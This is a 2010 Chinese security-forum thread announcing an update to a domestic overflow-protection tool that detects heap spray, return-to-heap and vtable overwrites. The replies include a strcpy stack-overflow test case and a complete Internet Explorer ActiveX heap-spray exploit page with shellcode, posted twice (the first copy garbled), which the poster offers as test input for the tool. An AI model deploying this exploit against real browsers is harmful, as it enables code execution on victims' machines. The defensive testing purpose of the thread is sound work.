首页
社区
课程
招聘
国产防溢工具,版本更新至156,攻击日志,漏洞类型判断开启
发表于: 2010-10-15 12:25 4883

国产防溢工具,版本更新至156,攻击日志,漏洞类型判断开启

2010-10-15 12:25
4883
1. return heap 检测
2. return library 检测
3. Heap Spray 检测
4. com vtbl 指针检测
5. 逻辑漏洞病毒木马检测
6. 部分危险函数 ESP 覆盖检测

[课程]Linux pwn 探索篇!

收藏
免费 0
支持
分享
最新回复 (13)
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
贴图一张
2010-10-15 12:29
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
Heap Spray 测试用例
上传的附件:
2010-10-15 12:54
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
str* 系列函数 testcase 部分代码
void teststring3()
{
        char test[24];
        strcpy(test,"aadsfsadfasdfdafadfadfasdfasfsafdsafasfdsafasfsafasdfafafafasfasfasfasdfdsafasdfasdfasfasdfasfsadfdsafsdfafdsfdafadsfdfadsfa");
}
2010-10-15 12:55
0
雪    币: 393
活跃值: (100)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
5
全是空白
上传的附件:
2010-10-17 10:24
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
请拿网页溢出攻击代码测试
2010-10-17 13:55
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
比如这个网页
<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='javascript'>

// Payload is win32_exec -  calc.exe  

shellcode = unescape('%uc931⑴寴玁㴓幆莕'+  
                    'ﳫ껁锚䘽탕촁逢䝅ằ'+  
                    '干쫕䜝状铕矓ಞ슑'+  
                    '蜺颔萼憵ሆ酺ꍈ쫕䜙'+  
                    '䪶ḕ婢繟媶铕쿖넂蔹啯'+  
                    '쵙ꔞ蚸餦ڶṒ婍ỳ乕鲵'+  
                    '욶问䘽﷕ᤁ捯ၝ淗蚾씥'+  
                    '㡕瞆⹎毆䢷樉◚錄䙞镞');  

nops=unescape('邐邐');  
headersize = 69;  //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
while(nops.length<slackspace) nops+=nops;
fillblock=nops.substring(0,slackspace);
block=nops.substring(0,nops.length-slackspace);
while(block.length+slackspace<0x40000) block=block+block+fillblock;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= block + shellcode;  
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");  

target.LoadProperties(ret);
</script>
</html>
2010-10-17 14:03
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
比如这个网页
<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='javascript'>

// Payload is win32_exec -  calc.exe  

shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  
                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  
                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  
                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  
                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  
                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  
                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  
                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');  

nops=unescape('%u9090%u9090');  
headersize = 69;  //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
while(nops.length<slackspace) nops+=nops;
fillblock=nops.substring(0,slackspace);
block=nops.substring(0,nops.length-slackspace);
while(block.length+slackspace<0x40000) block=block+block+fillblock;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= block + shellcode;  
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");  

target.LoadProperties(ret);
</script>
</html>
2010-10-17 14:08
0
雪    币: 131
活跃值: (98)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
9
这是啥原理啊
2010-10-17 14:20
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10


见新版界面图即可知。
上传的附件:
2010-10-17 22:16
0
雪    币: 131
活跃值: (98)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
11
看不懂啊。大牛讲解一下噻
2010-10-18 09:29
0
雪    币: 993
活跃值: (442)
能力值: ( LV12,RANK:403 )
在线值:
发帖
回帖
粉丝
12
[QUOTE=iiii;873041]全是空白
[/QUOTE]

我也一样
2010-10-18 10:24
0
雪    币: 315
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
我只是个卖茶叶的小商贩,如需茶叶批发请与我联系。
2010-10-18 15:00
0
雪    币: 563
活跃值: (95)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
硬件防溢出不会是DEP保护吧
2010-10-21 08:15
0
游客
登录 | 注册 方可回帖
返回
//